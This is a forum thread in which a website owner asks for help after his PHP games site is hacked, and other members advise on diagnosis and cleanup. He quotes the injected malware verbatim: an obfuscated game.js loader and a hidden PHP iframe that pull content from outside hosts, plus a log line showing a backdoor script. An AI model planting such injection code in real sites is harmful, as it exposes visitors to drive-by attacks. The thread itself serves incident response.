Has my site been hacked?

[hedgehog90]

My website this morning was displaying 2 iframes that I know I never put there in the code:

 

in index.php:

<script type="text/javascript" charset="ISO-8859-1" src="game.js"></script>

 

and in my public_html, there was a file called game.js that contained the following:

O="=100%iframewidthheig".split('');Q="document.write('< src=http://lolkatdska.co.in/sTDS/go.php?sid=1 ht frameborder=0 margin=0 marginht=0></>');";o="";for(J=3;J>-1;J--)Q=Q.split(o.charAt(J)).join(O[J]);eval(Q.replace(//g,'"'));

 

I am the only person with the login details to my website/cpanel, and I know I never uploaded/modified these files.

 

I've spoken to my host, but they told me they didn't see anything (because obviously I removed these foreign objects as soon as i noticed them). They don't seem too bothered about a security risk :/

 

Anyway, I've changed my login details and all that.

 

I mentioned above that I discovered 2 foreign iframes; the other one I found just a moment ago, again on my index page (but within a file called footer.php)

 

in footer.php:

<iframe src="<?= file_get_contents('http://white-star.biz/traffic_url.php?advertId=7&hash=919dac3bf6ad622657959934934bacf1'); ?>" width=0 height=0 border=0></iframe>

 

How did I not notice this before??? I think it was placed there in the last hour or so, after I removed the first iframe.

 

This is pretty weird, I changed my login details for cpanel/ftp and all that stuff over an hour ago!!! and since then I've found this new alteration that I never made!

 

I dunno, maybe it was there along with the game.js iframe but I didn't notice.... but as soon as I fixed the first one, I checked, and everything was fine.

 

Oh, and also, the php files index and footer are now have twice the number of returns as they originally did.

e.g:

<h1><?php include("ads/index_160x600_1.php"); ?></h1>

<h2><?php include("ads/index_125x125_1.php"); ?></h2>

<h3><?php include("ads/index_125x125_2.php"); ?></h3>

Became:

<h1><?php include("ads/index_160x600_1.php"); ?></h1>

 

<h2><?php include("ads/index_125x125_1.php"); ?></h2>

 

<h3><?php include("ads/index_125x125_2.php"); ?></h3>

 

The only way these files could have been altered is if someone knows my login details... but this just is impossible, how did this happen?

Is any of these weird files/modification familiar to anyone else?

 

We had a problem with the site a month ago when google suspected our site as some sort of security threat... because we were hosting content from xxxxxxxxx.com, a site we have no affiliation with and doesn't feature on our site at all. It was all quite bizarre and the google thing went away within a day of contacting them.

 

I have a feeling the same person/thing was behind this also.

 

HELP!

[teynon]

Are you using a content management system or anything like that? They are either getting into your system through the server via FTP or Cpanel, or they are hacking a poorly coded content management system.

[kenrbnsn]

If you're not using SSH & SFTP for login and file transfer, start using them immediately, preferable using keys, not passwords. You host should disable in bound telnet & ftp.

 

Your server may have been "rooted", i.e. when the first breakin occurred, a rogue program was installed which allows the scammers to get in and change your code whenever they want. The whole file system needs to be scanned for these rogue programs -- they can be very difficult to find.

 

If your current host doesn't want to deal with your problem (it's their problem too), move to another host.

 

BTW, when posting code in this forum, please put the code between

tags.

 

Ken

[hedgehog90]

Okay, well it's certainly been rooted.

 

Just found this in footer.php since deleting the last one:

 

<iframe src="<?= file_get_contents('http://white-star.biz/traffic_url.php?advertId=7&hash=919dac3bf6ad622657959934934bacf1'); ?>" width=0 height=0 border=0></iframe>

 

Please, tell me how I can get rid of this for good.

 

Btw, I've tried SSH & SFTP in filezilla, but it can never connect.

Also, I'm with Hostgator.

[teynon]

First of all, you should immediately take your website offline. Either park the domain name temporarily or advice hostgator of what is going on specifically. If they refuse to cooperate, take your business elsewhere. Personally, I would have taken my business elsewhere as soon as they told me that nothing was wrong. It could still be a content management system if you are using something like that.

[hedgehog90]

I've emailed hostgator once again with further information, and a link to this thread.

 

I've decided not to take the site down temporarily, that seems like quite a massive thing to do for such a small problem.

Well, unless it's not as small as I think?

[kenrbnsn]

It's not a small problem. You don't know what the scammers are doing with the data they are collecting. They could be keylogging everything that is typed, they could also be sending out spam from your site. That happened to me a few years ago and got my domain blacklisted. It took months to get the domain off the blacklists.

 

Ken

[Philip]

Look through your files (any other unknown files) for a backdoor. It isn't hard to create a PHP file that automatically adds or changes files upon request.

 

If your current host doesn't want to deal with your problem (it's their problem too), move to another host.

[teynon]

I would still strongly recommend taking your site down. Or at least backing up and removing all the files online temporarily. You are potentially hurting all of your viewers and with the way the government is, you could even get in trouble if the bad guys are being bad enough. Either way, its always better to be safe. I promise you if someone goes to your site and gets a virus, that's probably the last time they will ever visit your site. And don't think they'll recommend it to anyone else either.

[scuarplex]

Check your apache log.

 

Are you using any kind of premade CMS or something like that?

[ram4nd]

Change passwords and use secure operating system.

[hedgehog90]

Oh, silly I haven't mentioned yet the url of my website:

www.gpstudios.com

 

If by CMS you mean a back-end, then yes, however it can't add to files like index.php or anything like that. It's a games website. The backend allows me to upload/delete games and little else. The hacker must have gotten in through FTP.

 

I have changed the password to the server account.

I use Windows 7.... is that secure enough?

I'm quite confident that my computer doesn't have any viruses or trojans.

 

Can someone please explain to me how someone can get my personal details/upload files to the server space without my permission?

I understand that hacking exists, but I've never truly gotten my head round how websites are hacked into without a data leak?

[teynon]

Yeah, you need to change the passwords for EVERYTHING. Your CMS needs new passwords and you need to check the CMS login logs.

[hedgehog90]

I changed the password and username for my CMS earlier today, but as I just said (in my editted post), the hacking was certainly not done through the CMS. It's not capable of uploading anything but swfs, text and pictures.

[xyph]

Check your SQL database. It could be injected in there, as anything you echo from your database that you didn't perform htmlentities/etc on could contain rouge markup/scripting.

 

Also, delete your entire site and re-upload a clean version. A file system compromise means there could be embedded code in ANY of your web-accessible PHP files that could allow attackers to upload anything they want to your server, or change any code in any file.

 

A single hole generally leads to the attacker opening up many more in case the one they're using gets closed.

[hedgehog90]

What search term should i search for in mySQL?

 

Download the site and reupload it?

I'm sorry, but I really don't see the sense in that, also, due to the amount of data on the website, it would take my internet connection 10s of hours to do this.

This would be a last resort, it would be such a massive job.

 

Hostgator are helping me at the moment, hopefully they'll sort it out to some degree.

[xyph]

MySQL you want to find any HTML in cells that might be echo'd. Look for malicious markup.

 

We're trying to help. Cut your losses and do it. Next time hire a developer who knows how to deal with attackers.

It's pretty much like dealing with an infected Windows system. I could spend tens of hours hunting for every hole the malware has opened, possibly not getting everything, or I could spend tens of hours backing up uninfected data, wiping the system, and reinstalling all the software/restoring backups and know I've got a clean start...

 

Before you reupload I would find the hole in your script that allowed the initial attack.

[Pikachu2000]

You came here asking for help, and it seems like no matter what is suggested, you don't want to do it for some lame reason or another. You're just going to keep having the same problem over and over again, and it will be your own fault.

[scuarplex]

This looks like an automated attack of some russian spammer.

 

Check your apache logs in the time that your files were modified and you'll know exactly how they do it.

Also check your upload folder to see if you find any strange file. Uploaders can be bypassed depending on how you code it.

[teynon]

Might I mention this has nothing to do with PHP coding help?

[Pikachu2000]

You can mention it, but I don't think that can be firmly concluded yet. However since the OP hasn't provided any code, I'm moving the thread to miscellaneous.

[scuarplex]

One more thing, update your phpBB3 forum!

 

It's pretty old, and there's already a few XSS in the wild that affects it.

[hedgehog90]

One more thing, update your phpBB3 forum!

 

It's pretty old, and there's already a few XSS in the wild that affects it.

 

I updated it this morning because i read that it might have been the problem. It's up to date, I'm on 3.0.8.

[hedgehog90]

Ok, I've found something.

I was going through the logs, and I found the first occurance of the game.js file being loaded.

I looked back a few seconds before this and found a "POST" that said:

 

188.226.15.54 - - [31/May/2011:09:49:25 -0500] "POST /games/files/w/w.php HTTP/1.1" 200 12970 "http://www.gpstudios.com/games/files/w/w.php" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24"

 

I looked inside the /games/files/w/ and sure enough, there it was.

I've attached it to show it to you.

 

I have no idea how this was uploaded. It means it was likely done on the  back-end and not through ftp, but the script for uploading new games does not allow the upload of php files, and it's not recorded by mySQL :/

 

.... I've just been thinking, how could the person who uploaded that file run it? Anything within /games/ is inaccessable because I had locked directory indexing (going through folders like a contents page) in the htaccess file... but last night I noticed my my htaccess had disappearred! I didn't even relate it to the apparrent hacking I had spent all day trying to fix. I re-uploaded an old one and didn't think anymore about it.

It must have been deleted by the person who uploaded it, and then the script was run....

 

I can't see how it could have been uploaded through the back-end... the only evidence for it is that the w.php file is within a folder called w, which is exactly the same format as the games files.

 

Help, please.

 

[attachment deleted by admin]

[kenrbnsn]

You're not locking the directory from running scripts, you're locking a browser from getting a directory list. The hackers didn't have to get a list to see what was there, since they put the file there. If you don't want people to run scripts in a directory from a web browser, that directory needs to be outside the web root.

 

What is the protection on the games directory. If it's 777, that means it's open to the world and the hackers could have gotten there from a different host on the share host.

 

Ken